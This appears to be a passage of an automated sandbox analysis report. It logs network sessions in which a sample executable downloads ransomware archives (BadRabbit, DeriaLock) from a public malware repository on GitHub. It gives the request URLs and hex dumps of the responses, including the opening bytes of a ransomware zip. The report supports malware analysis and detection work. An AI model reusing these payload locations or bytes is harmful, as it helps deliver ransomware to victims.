69 67 6e 20 75 70 3b 72 65 66 5f 6c 6f 63 3a 68 65 61 64 65 72 20 6c 6f 67 67 65 64 20 6f 75 74 26 71 75
                                                                                                                                                Data Ascii: lytics-event="{&quot;category&quot;:&quot;Sign up&quot;,&quot;action&quot;:&quot;click to sign up for account&quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:Sign up;ref_loc:header logged out&qu
                                                                                                                                                2022-09-29 12:52:04 UTC38047INData Raw: 73 2d 66 6c 61 73 68 2d 63 6c 6f 73 65 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 44 69 73 6d 69 73 73 20 74 68 69 73 20 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 78 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 2e 37 32 20 33 2e 37 32 61 2e 37 35 2e 37 35
                                                                                                                                                Data Ascii: s-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75
                                                                                                                                                2022-09-29 12:52:04 UTC38048INData Raw: 41 45 41 41 41 41 55 41 41 41 2f 2b 34 41 44 6b 46 6b 62 32 4a 6c 41 47 54 41 41 41 41 41 41 66 2f 62 41 49 51 41 41 67 49 43 41 67 49 43 41 67 49 43 41 67 4d 43 41 67 49 44 42 41 4d 43 41 67 4d 45 42 51 51 45 42 41 51 45 42 51 59 46 42 51 55 46 42 51 55 47 42 67 63 48 43 41 63 48 42 67 6b 4a 43 67 6f 4a 43 51 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 45 44 41 77 4d 46 42 41 55 4a 42 67 59 4a 44 51 73 4a 43 77 30 50 44 67 34 4f 44 67 38 50 44 41 77 4d 44 41 77 50 44 77 77 4d 44 41 77 4d 44 41 38 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 2f 38 41 41 45 51 67 42 6e 77 4f 73 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 4c 59 41 41 41 4d 42 41 51 45 42 41 51 41 41 41
                                                                                                                                                Data Ascii: AEAAAAUAAA/+4ADkFkb2JlAGTAAAAAAf/bAIQAAgICAgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwMDAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwM/8AAEQgBnwOsAwERAAIRAQMRAf/EALYAAAMBAQEBAQAAA
                                                                                                                                                2022-09-29 12:52:04 UTC38049INData Raw: 54 51 2f 33 42 67 68 57 2b 6d 56 4b 42 39 4d 6f 56 76 70 70 52 73 43 67 47 50 43 69 74 6a 77 67 32 49 51 44 45 49 42 67 45 55 4d 41 68 7a 68 67 69 6c 77 4b 47 41 78 37 4b 51 6f 59 38 49 42 6a 77 67 47 43 41 59 46 5a 57 77 4d 43 69 30 75 42 52 43 6d 78 43 67 62 46 46 4c 67 50 78 51 4c 39 4d 62 4b 4b 47 48 43 42 63 4f 47 36 4b 52 51 4e 71 51 35 69 47 78 46 4c 67 6d 54 42 54 61 70 46 49 62 55 55 70 73 34 51 4c 68 77 6d 63 4c 6a 4a 44 61 52 6f 70 41 70 73 65 61 49 74 4c 39 4e 51 49 62 44 71 6f 70 44 59 4f 36 42 66 70 68 54 4b 34 49 62 4f 50 42 52 55 38 57 68 75 36 42 63 5a 68 52 53 34 74 32 55 55 70 74 65 45 71 78 4d 32 6d 72 39 30 43 47 32 43 69 6b 4e 70 32 64 31 43 46 4e 71 67 58 45 37 49 4f 45 43 42 48 52 64 48 4f 6d 41 62 70 6f 71 68 67 50 46 55 55 41 34
                                                                                                                                                Data Ascii: TQ/3BghW+mVKB9MoVvppRsCgGPCitjwg2IQDEIBgEUMAhzhgilwKGAx7KQoY8IBjwgGCAYFZWwMCi0uBRCmxCgbFFLgPxQL9MbKKGHCBcOG6KRQNqQ5iGxFLgmTBTapFIbUUps4QLhwmcLjJDaRopApseaItL9NQIbDqopDYO6BfphTK4IbOPBRU8Whu6BcZhRS4t2UUpteEqxM2mr90CG2CikNp2d1CFNqgXE7IOECBHRdHOmAbpoqhgPFUUA4
                                                                                                                                                2022-09-29 12:52:04 UTC38051INData Raw: 35 55 77 43 31 47 56 42 61 33 78 51 70 77 46 57 61 6f 4c 54 73 67 70 62 59 2b 69 46 55 46 68 30 46 56 54 4a 78 59 55 53 71 43 7a 64 56 46 42 59 37 53 71 69 67 39 4d 43 74 55 54 4f 54 69 77 4b 6f 6f 4c 41 68 56 42 61 4e 75 36 46 50 62 5a 77 72 6c 4d 4b 43 78 51 70 78 61 4f 71 73 51 34 74 4f 79 71 47 46 69 42 38 65 46 59 48 46 68 56 51 77 39 4e 45 4f 4c 41 67 59 57 38 4b 77 50 67 67 62 41 49 6d 54 43 31 41 32 50 44 49 6f 34 4b 6f 63 57 64 30 4b 59 57 49 68 73 41 67 49 73 47 79 71 47 46 76 43 4c 79 47 77 4b 49 49 39 4d 6f 55 33 30 39 30 6f 50 30 77 6c 44 43 77 62 49 44 69 4e 6c 63 4a 6b 63 65 79 41 34 6f 44 69 6e 4d 66 45 52 59 67 4f 43 41 34 42 41 63 41 68 57 77 53 67 34 63 49 67 34 63 49 44 69 71 4e 68 77 6f 6f 34 6c 42 73 55 51 63 45 47 77 52 52 77 53 70
                                                                                                                                                Data Ascii: 5UwC1GVBa3xQpwFWaoLTsgpbY+iFUFh0FVTJxYUSqCzdVFBY7Sqig9MCtUTOTiwKooLAhVBaNu6FPbZwrlMKCxQpxaOqsQ4tOyqGFiB8eFYHFhVQw9NEOLAgYW8KwPggbAImTC1A2PDIo4KocWd0KYWIhsAgIsGyqGFvCLyGwKII9MoU3090oP0wlDCwbIDiNlcJkceyA4oDinMfERYgOCA4BAcAhWwSg4cIg4cIDiqNhwoo4lBsUQcEGwRRwSp
                                                                                                                                                2022-09-29 12:52:04 UTC38052INData Raw: 55 6f 2f 54 55 4b 33 30 79 6c 41 77 51 48 44 68 42 73 43 68 41 78 4b 68 47 78 54 34 72 4f 52 73 54 73 67 32 4a 32 51 62 45 37 49 4e 69 64 6c 42 73 65 45 55 4d 55 47 78 53 4c 51 77 55 47 77 43 46 62 43 31 43 68 67 45 79 59 44 44 67 4b 44 59 6f 46 78 4f 79 4b 32 4a 51 44 48 68 41 44 61 68 43 34 42 41 44 59 69 77 75 48 43 6d 63 6d 4d 42 67 64 6b 61 44 41 37 49 6d 41 77 34 55 69 6c 50 70 70 43 6c 77 53 4c 53 2f 54 51 4b 66 54 55 43 2f 54 47 79 51 44 36 59 32 55 79 75 43 48 30 78 73 69 6b 4e 68 43 68 67 70 74 55 55 68 73 34 52 53 47 31 41 68 74 52 53 47 7a 68 51 49 66 54 4b 4b 51 32 48 62 75 6f 71 64 31 69 69 70 6d 77 71 5a 79 45 4e 69 4c 6a 4b 5a 39 4d 4b 4b 6d 62 4e 6c 46 54 4e 76 43 4b 6d 62 4f 46 41 68 43 6d 63 4b 6e 64 61 66 77 55 56 49 32 6f 53 6c 62 33
                                                                                                                                                Data Ascii: Uo/TUK30ylAwQHDhBsChAxKhGxT4rORsTsg2J2QbE7INidlBseEUMUGxSLQwUGwCFbC1ChgEyYDDgKDYoFxOyK2JQDHhADahC4BADYiwuHCmcmMBgdkaDA7ImAw4UilPppClwSLS/TQKfTUC/TGyQD6Y2UyuCH0xsikNhChgptUUhs4RSG1AhtRSGzhQIfTKKQ2Hbuoqd1iipmwqZyENiLjKZ9MKKmbNlFTNvCKmbOFAhCmcKndafwUVI2oSlb3


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                69192.168.2.549772140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:52:40 UTC38053OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2022-09-29 12:52:40 UTC38054INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:52:40 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:52:40 UTC38054INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                7192.168.2.549707185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:18 UTC700OUTGET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:18 UTC700INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 215551
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:18 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6950-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455878.037099,VS0,VE5
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 93b40b7353fb0902ae0a8c03737a9bf7d5419db7
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:18 GMT
                                                                                                                                                Source-Age: 69
                                                                                                                                                2022-09-29 12:51:18 UTC701INData Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e
                                                                                                                                                Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
                                                                                                                                                2022-09-29 12:51:18 UTC717INData Raw: b9 04 ef e5 b5 1e 93 b8 4e a1 b4 53 1a cc fc 6d 97 50 7c 82 55 5b 35 40 77 ce 45 20 7c 9b dd 70 78 ee 63 96 27 e6 e7 22 3e 0f 4a 99 2c 6d d3 ec 98 3d cf 4d 0e b2 22 70 c5 9c 7b 6f e4 a2 0b a8 15 da 6f 30 b6 b7 da c3 fb 9d 45 b4 99 ad 6f 98 f7 48 d6 6f 19 4a 4a f2 fd e4 b3 87 ba 45 80 fd 8a e9 bc 49 83 69 71 02 7c b4 57 fe c9 18 62 88 bc a1 13 e6 f9 f5 55 6e fe 08 1a 0b b8 97 eb ff 58 7b 21 c2 10 a4 91 95 04 76 7d cd e7 51 91 41 45 46 ec 5a 7a 07 14 ec 02 e5 17 3d 8f 7e e6 79 bc ac 3a cd bd e6 c0 a9 3e f2 64 6e 91 13 7b 50 fd e4 79 f7 5d 13 47 16 8a db c8 59 40 12 97 bb bb 21 a5 f8 74 2a e8 7f d5 3d 34 ad 16 80 71 a0 ee 3f 4a a2 ec 2a 28 51 a1 c7 4c a2 cd a7 c5 fa 0a b5 4c 22 b7 46 15 39 51 9b c1 6c 26 de 12 e3 f7 6a f1 a5 d5 00 f1 99 e5 3f 48 cc 54 ea 6a
                                                                                                                                                Data Ascii: NSmP|U[5@wE |pxc'">J,m=M"p{oo0EoHoJJEIiq|WbUnX{!v}QAEFZz=~y:>dn{Py]GY@!t*=4q?J*(QLL"F9Ql&j?HTj
                                                                                                                                                2022-09-29 12:51:18 UTC733INData Raw: be b5 f9 04 4b 96 10 c4 84 c9 fc 9a e1 19 8f d9 99 51 55 74 ca 5c c7 69 99 8a bc dc 70 ca ce fe f5 48 2e 64 75 41 cb db d8 b3 2e ab 9f 7e 80 9c 94 20 5b 3b 35 29 92 55 c6 15 9f db dd 5a 5c 7c 42 0f 3d 08 6b 51 46 54 68 7a 1b 07 e1 72 47 69 2a 49 1a 5d 63 05 b9 5d 2d b5 aa b3 96 40 60 cb ec 87 11 0e ea 11 bf 4f 9e b0 34 af 98 23 e2 f1 97 8e 0f be f2 ca 9b 45 fd 97 50 cd 7b 41 f5 64 e6 fa c5 c1 be e7 be ec 2b 35 0b 54 e7 26 f1 be 39 d7 3b 3b b5 78 c0 ae d0 1e 9d 91 e6 b2 a5 ec 94 31 89 6b b1 b0 26 3d db de 44 60 e4 2a 29 be 93 46 29 6f 8a 92 9a 5f e3 01 5e 0d 67 02 89 56 9d 29 b9 73 b9 22 04 64 20 07 8d a0 43 f2 08 4d d4 66 8e 2b 93 14 4c 4a 0c e1 27 3c 12 fd fb 13 a3 78 d5 bb 67 86 73 b3 32 82 cf c1 9d 57 0f a3 e9 27 00 2e 05 e2 3c 92 dd ec be da 9f cf f4
                                                                                                                                                Data Ascii: KQUt\ipH.duA.~ [;5)UZ\|B=kQFThzrGi*I]c]-@`O4#EP{Ad+5T&9;;x1k&=D`*)F)o_^gV)s"d CMf+LJ'<xgs2W'.<
                                                                                                                                                2022-09-29 12:51:18 UTC749INData Raw: 77 82 bb 40 4c cc e4 8e eb b4 04 48 62 2f f0 09 86 b6 3f 23 bf d5 c7 ac 58 dd 60 3e 7c 51 4a e0 e2 69 5f 80 d2 7f d4 b3 49 df 51 a5 67 97 94 ec 8b a1 27 db f5 80 3e f4 25 65 13 4d 6d 10 63 d3 09 ff e7 07 ff e5 b0 c1 95 56 3e f1 1e c4 2f f0 ab ee 40 b6 41 57 3e 2a 33 fe b6 82 60 a9 8a f2 b5 a4 55 61 9b 81 d6 f2 14 01 32 f3 aa 9d d2 88 67 96 ca 22 d4 bd 52 cc 3d 99 0e 95 27 22 29 f1 4e 35 01 16 43 ed 45 cb 4f 3c e3 42 04 7a 5b d8 e3 78 63 1a b6 93 f6 8f a4 39 3b bc 37 45 2f f3 cc 86 b1 49 c9 5a 76 e4 84 35 e3 2b fb fa 6c 55 18 94 95 79 19 27 8e ad 94 56 00 ba 82 e8 b6 2b 8b 6a 46 e8 46 58 b6 72 b8 5b 88 cb 92 d5 99 dd 17 53 63 f6 d7 71 55 51 a7 20 18 c6 40 59 d9 7b e6 90 e9 84 85 41 61 3e ea 7d e0 95 b8 97 82 af bf d3 d0 c9 de 2d 27 ef 0a e4 8c e0 04 51 8f
                                                                                                                                                Data Ascii: w@LHb/?#X`>|QJi_IQg'>%eMmcV>/@AW>*3`Ua2g"R='")N5CEO<Bz[xc9;7E/IZv5+lUy'V+jFFXr[ScqUQ @Y{Aa>}-'Q
                                                                                                                                                2022-09-29 12:51:18 UTC765INData Raw: d3 ac e4 74 31 36 3a e7 8d aa 53 56 eb 73 62 67 c6 d6 8b f3 ae b0 bc 6a 96 22 1a ac 4c 5e 60 d4 94 4b 20 9d 1d ce 6f 17 c3 a5 db 4a 07 10 d7 c9 e9 48 fd cb 1b 7a f6 7b b0 38 5d 3f 3e 5c bd a5 65 cd 19 66 0e f6 3a 71 da 07 e7 69 fa 1e c8 27 79 d6 3e e1 e2 36 7b ea 00 44 0f d3 a1 94 69 54 88 73 54 7b fd e0 15 a1 f9 06 e9 c5 67 39 24 87 1e cf ed 99 37 60 09 18 f1 c3 6a f6 32 f4 bc 76 79 7f 56 ba 04 6b 1b cd f6 2e 55 ea 44 59 1c 47 e3 cc 76 b8 85 50 24 bd da fe 3c 43 a6 2a 64 06 ac 43 10 28 2a 25 c3 d9 ea fd e6 ab c2 73 ce 5a bc 1c d8 ac f7 27 50 9d a7 d9 6d 2f 0c 9d 28 e2 77 cf ee d6 de a6 fa 77 88 54 a6 71 db 71 a3 ab 34 86 a2 47 fd ed ff 7b 12 14 3b 80 df da 24 02 0f a8 49 d3 e7 8f 3b d5 58 46 c3 af 3f de 14 48 92 07 04 a3 01 2e f2 7f 6a b7 e9 00 f9 7e d8
                                                                                                                                                Data Ascii: t16:SVsbgj"L^`K oJHz{8]?>\ef:qi'y>6{DiTsT{g9$7`j2vyVk.UDYGvP$<C*dC(*%sZ'Pm/(wwTqq4G{;$I;XF?H.j~
                                                                                                                                                2022-09-29 12:51:18 UTC781INData Raw: 5d 2d dc bb 34 7f de da 8a e8 82 58 b1 af 86 37 e8 fc 5a 79 f4 f4 c9 0f 03 9c 4c 34 7d aa 92 de 6a a0 fb 33 7c 20 ad 0b ff 08 75 0d a7 1b 05 dd f0 f2 78 7d f9 81 15 ec b3 a4 17 ef c2 64 9a f5 9c 41 10 20 95 cb fd a6 60 0d c9 34 98 4b 45 e0 be 15 4a b6 a9 fa 5e dd ba c6 7d 27 6b 7f 02 e3 ff f7 67 54 3f 25 24 1b 39 25 e9 cf b5 8b 88 e7 46 bc fe 58 f0 14 99 6b 49 e9 46 ec a7 aa 14 8c 12 1a 02 8e bd 16 ac 2c cf fe 31 35 e8 3e 3b e0 d9 f5 6d 8f 6b 0d 43 99 9a 7f 97 ac 6d 3f 80 bb c1 0a f5 03 01 37 62 3d f2 0e 4a 38 29 7a a1 eb 30 a5 e8 82 54 d6 ae 7a 13 ed a1 22 b9 9a 93 7b e7 52 24 15 06 94 30 1b 2a d9 18 b9 3b 21 9b 62 4c 5e 82 85 86 44 26 d5 0d 5a 50 63 da ea 41 d0 c9 15 c1 54 ce c0 1e cb cd 4c 7d bc cd 0b 83 08 16 79 52 97 fa 6a ef 32 29 20 81 e7 dc 46 2a
                                                                                                                                                Data Ascii: ]-4X7ZyL4}j3| ux}dA `4KEJ^}'kgT?%$9%FXkIF,15>;mkCm?7b=J8)z0Tz"{R$0*;!bL^D&ZPcATL}yRj2) F*
                                                                                                                                                2022-09-29 12:51:18 UTC797INData Raw: d1 b4 e6 05 4e 6f c0 f0 9a 2d ae ab af 79 ac 93 c8 5a af 81 ee 2d 78 80 72 fe 44 67 3d a5 5f 34 61 e2 c0 89 c5 22 9b e2 82 3d 4c a1 5d a9 86 08 8a 1e 6d 0e b6 a9 5a d3 80 e6 44 56 54 0e 17 16 a3 41 dd 29 36 05 59 b8 d1 fa bf 6b 18 93 e0 56 97 dd 73 0f af aa 5b b6 0e c9 02 82 10 a1 0b 4f a7 3f 32 4e 6d f5 fb a7 64 59 43 02 d0 cd 44 e5 04 22 b4 72 e4 86 e6 8e a9 d5 e9 51 04 38 d8 03 6b b0 7e aa b1 6b 65 4c e7 b3 4d 80 ec 9b a8 1f da fc d3 02 c7 f3 aa e9 f7 3a 65 58 41 4e ac ae c7 d9 14 83 e2 8d 47 df 9f 23 8a 3a 25 c8 53 7b 5a 2a ac 78 81 90 49 9b ea b9 29 70 98 fb 00 e1 3a f0 cd cd 6c dd 7c e0 fc 36 26 91 21 21 50 70 66 5e ab dd e8 6a 04 f6 7d b3 19 1c b6 a1 cb ac 44 f2 25 5d f5 f1 17 d9 be 27 79 a4 f4 65 73 88 bc d2 36 81 8d 8a 40 05 3e 51 05 7d fa c4 eb
                                                                                                                                                Data Ascii: No-yZ-xrDg=_4a"=L]mZDVTA)6YkVs[O?2NmdYCD"rQ8k~keLM:eXANG#:%S{Z*xI)p:l|6&!!Ppf^j}D%]'yes6@>Q}
                                                                                                                                                2022-09-29 12:51:18 UTC813INData Raw: b0 52 5c ed 9c 2b 41 4d a9 96 bd 1b e2 bc 49 e4 1b 7c 8c 97 28 20 17 40 98 13 e7 42 85 97 38 6c cc 3b 33 d0 d9 1c 39 54 09 51 32 6e 9c a4 15 34 45 fa da 1e e1 2f 28 ac 3d 38 62 38 08 ab 5c 50 f5 a3 44 97 f2 47 2a 4f 5e ad 15 aa bd 46 cc 0a 26 70 48 68 ea f3 48 fd 70 ef 1f d9 26 92 09 61 15 9c 68 77 26 ef d7 05 82 48 c0 df 31 bb 1a 9c ac d2 cb b0 7b 56 33 73 01 ee 4d 29 b2 91 e6 d7 a8 66 a0 77 ed a4 1b 13 92 5d 60 c5 f4 79 e5 bc 2f d6 3d bd e7 89 df 34 57 e1 cd fc ce 08 9d df c8 ef dc 31 f8 8b 2f 18 96 56 fb 68 9c cc c0 c9 7d 55 7d ae 1f 1a 65 aa 0c c8 9d 9c 20 6c 46 c0 5d c1 22 09 e2 4f c0 d8 9b ed b8 73 a0 19 70 44 88 a0 8b c1 77 32 dd 84 5a ef 6d ce b1 75 f4 c4 35 31 99 37 46 eb 6b 65 db 76 97 6c b9 9d f0 66 c5 ef 8e 97 f4 06 82 61 85 1c e7 29 36 ef e9
                                                                                                                                                Data Ascii: R\+AMI|( @B8l;39TQ2n4E/(=8b8\PDG*O^F&pHhHp&ahw&H1{V3sM)fw]`y/=4W1/Vh}U}e lF]"OspDw2Zmu517Fkevlfa)6
                                                                                                                                                2022-09-29 12:51:18 UTC829INData Raw: c8 29 1a 05 f9 a1 95 0e 42 08 1c 2d ca 36 e7 56 8b 87 4b 8e e8 ef 0e a3 d2 6f 82 ab f2 50 cd ac 81 23 9f 55 76 71 c5 7d 15 6f b0 69 5e 0c 9b 77 90 93 04 11 fb dd 8d cc 14 e5 31 85 e9 8d 6c d2 5b 9e 19 1f c7 07 26 af c2 01 7c d8 37 a2 b0 67 f3 11 18 fd 23 85 e3 06 14 62 66 db 55 d8 43 8a 00 fd 1a f4 d9 08 54 2f b2 32 6b ba 81 0a 4d 9c 1f bf dd 52 09 15 d0 8e 2f 98 1e ae 3d 8d c7 aa 1b 08 a6 ff c6 55 51 aa 4c 9c 27 c3 1c 05 78 4f de 6d d7 ed fa b9 cb 83 25 69 3b f6 b6 50 8f 10 e7 6a c9 85 4a 59 77 6d 68 16 4e fb 61 75 0d 31 46 e0 30 86 0e a8 4e 3a bf 6c 59 e8 94 84 b7 7a 72 b1 06 bf 26 47 12 ca ca f5 98 34 52 42 11 c5 fa 9c bd a4 6e 1e 5c 75 99 33 db 6f 24 61 07 f8 35 a5 31 59 d4 20 35 e4 62 cc 13 9d 0f b7 3a 02 6f a7 70 cf 15 4c aa 7f ac e8 29 fe 57 ef a6
                                                                                                                                                Data Ascii: )B-6VKoP#Uvq}oi^w1l[&|7g#bfUCT/2kMR/=UQL'xOm%i;PjJYwmhNau1F0N:lYzr&G4RBn\u3o$a51Y 5b:opL)W
                                                                                                                                                2022-09-29 12:51:18 UTC845INData Raw: 68 c9 4d a8 c1 39 e9 04 42 7a 37 a2 cb 1c 62 1c 43 35 85 0b 11 cc 7f 80 79 86 c1 4c 51 ae 18 f3 ab 4e 2d 20 57 12 ce 89 cf 8e 29 33 9e 15 7e c5 52 cd e5 35 44 88 4a 57 9b 4d bf 3d 45 9e a6 f7 fa 93 87 02 86 3a 1d d3 e8 55 0f 85 ee 61 a7 42 e9 60 ab fc 87 ba 7b 03 c7 43 fe 86 26 bc 6f 24 11 5b c4 fd d9 c4 e0 bf 76 b3 5c 8b 45 8c 6c fe 90 f6 bb 44 25 a3 2e 7b 76 8f d0 4e 11 90 8d 8d 14 82 5f 14 0a 0d d8 18 3e 0c cb 2a 78 5b 45 5f 92 96 73 0d e9 5c 67 2e 02 07 e2 02 34 f0 a9 4f 60 5c af a1 0a 9c 83 fa f5 d4 6f b8 1e f3 eb 29 de 3e 87 6b e5 ca 9f 97 31 42 0a 8e 13 9e d5 81 43 be 79 37 61 f1 7a 2f e9 96 59 0e cf f5 bb f3 19 e2 a6 e4 42 bf cc 5d 3a 95 2d 04 30 0b 80 30 d4 7d 82 35 26 99 e9 e2 3b 5f 17 f3 43 83 40 df 96 b0 ee 49 44 f2 2d 08 19 59 e5 6f 9d 4f fb
                                                                                                                                                Data Ascii: hM9Bz7bC5yLQN- W)3~R5DJWM=E:UaB`{C&o$[v\ElD%.{vN_>*x[E_s\g.4O`\o)>k1BCy7az/YB]:-00}5&;_C@ID-YoO
